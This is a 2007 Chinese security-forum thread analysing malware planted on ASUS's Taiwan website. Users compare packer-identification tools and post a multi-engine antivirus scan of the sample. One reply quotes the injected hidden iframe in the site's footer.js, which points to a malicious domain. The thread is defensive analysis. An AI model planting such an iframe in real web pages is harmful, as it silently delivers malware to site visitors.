收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 华硕电脑台湾官网被挂威金
12345下一页
返回列表 发新帖
楼主: 绅博周幸
 收起左侧

[病毒样本] 华硕电脑台湾官网被挂威金

[复制链接]
The EQs
发表于 2007-5-12 15:46:50 | 显示全部楼层
现在不流行看查壳工具。。。直接看多引擎or杀软就OK了
回复

举报

promised
发表于 2007-5-12 15:47:53 | 显示全部楼层
原帖由 EQ2 于 2007-5-12 15:46 发表
现在不流行看查壳工具。。。直接看多引擎or杀软就OK了

为啥PEID只说加了UPX
不过我还是相信加了NSANTI
因为某些壳王是很准的

[ 本帖最后由 promised 于 2007-5-12 15:49 编辑 ]
回复

举报

The EQs
发表于 2007-5-12 15:49:44 | 显示全部楼层
自己去问peid。。。。。

PS:PEID很多壳都查不出来。。。现在偶就看杀软报的情况来判断

[ 本帖最后由 EQ2 于 2007-5-12 15:51 编辑 ]
回复

举报

promised
发表于 2007-5-12 15:52:35 | 显示全部楼层
原帖由 EQ2 于 2007-5-12 15:49 发表
自己去问peid。。。。。

PS:PEID很多壳都查不出来。。。现在偶就看杀软报的情况来判断

PEID误报也很多
回复

举报

solcroft
发表于 2007-5-12 15:54:39 | 显示全部楼层
原帖由 小邪邪 于 2007-5-12 17:04 发表
还有一个疑点:
为什么我的AVK里的avast引擎所报的跟上面的avast报的名字都不一样?


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

The EQs
发表于 2007-5-12 16:04:57 | 显示全部楼层

为何偶的扫描结果不一样???

AhnLab-V3 2007.5.10.0 05.11.2007  no virus found
AntiVir 7.4.0.15 05.11.2007 TR/Crypt.NSPM.Gen
Authentium 4.93.8 05.11.2007 Possibly a new variant of W32/PWStealer1!Generic
Avast 4.7.997.0 05.11.2007 Win32:Agent-EWQ
AVG 7.5.0.467 05.11.2007  no virus found
BitDefender 7.2 05.12.2007  no virus found
CAT-QuickHeal 9.00 05.11.2007 (Suspicious) - DNAScan
ClamAV devel-20070416 05.12.2007  no virus found
DrWeb 4.33 05.12.2007  no virus found
eSafe 7.0.15.0 05.10.2007 suspicious Trojan/Worm
eTrust-Vet 30.7.3628 05.11.2007  no virus found
Ewido 4.0 05.11.2007  no virus found
FileAdvisor 1 05.12.2007  no virus found
Fortinet 2.85.0.0 05.12.2007 suspicious
F-Prot 4.3.2.48 05.11.2007 W32/PWStealer1!Generic
F-Secure 6.70.13030.0 05.11.2007  no virus found
Ikarus T3.1.1.7 05.12.2007 Worm.Win32.Viking.ex
Kaspersky 4.0.2.24 05.12.2007  no virus found
McAfee 5029 05.11.2007  no virus found
Microsoft 1.2503 05.12.2007 PWS:Win32/Frethog.C
NOD32v2 2262 05.12.2007  no virus found
Norman 5.80.02 05.11.2007  no virus found
Panda 9.0.0.4 05.11.2007 Suspicious file
Prevx1 V2 05.12.2007  no virus found
Sophos 4.17.0 05.11.2007 Mal/EncPk-F
Sunbelt 2.2.907.0 05.12.2007  no virus found
Symantec 10 05.12.2007  no virus found
TheHacker 6.1.6.114 05.12.2007  no virus found
VBA32 3.12.0 05.11.2007 MalwareScope.Worm.Viking.3
VirusBuster 4.3.7:9 05.11.2007 Trojan.OnlineGames.Gen!Pac.19
Webwasher-Gateway 6.0.1 05.11.2007 Trojan.Crypt.NSPM.Gen
回复

举报

Giggs
发表于 2007-5-12 16:05:02 | 显示全部楼层
这样的大公司都被挂马......
回复

举报

1p1
发表于 2007-5-12 16:11:20 | 显示全部楼层
原帖由 绅博周幸 于 2007-5-12 15:30 发表




VBA32        3.12.0        05.11.2007        MalwareScope.Worm.Viking.3


文件是可执行文件,虽然不是EXE结尾的[:26:] [:26:]



运行以后看样子不是围巾
倒想是PWStealer
回复

举报

dikex
发表于 2007-5-12 17:41:03 | 显示全部楼层
原帖由 绅博周幸 于 2007-5-12 15:28 发表

估计是被清理掉了,大公司一直被挂马的话影响不好啊




马还在,挂到了http://tw.asus.com/886/html/footer/footer.js里面了,最下面多了一个iframe:

<IFRAME src="http://www.qmvbi.com/app/play.do" width=100 height=0>

这年头,真是不安全啊
回复

举报

1p1
发表于 2007-5-12 18:01:27 | 显示全部楼层
[quote]原帖由 dikex 于 2007-5-12 17:41 发表 马还在,挂到了http://tw.asus.com/886/html/footer/footer.js里面了,最下面多了一个iframe:这年头,真是不安全啊 [/quote]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

下一页 »
12345下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-12 06:51 , Processed in 0.088804 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表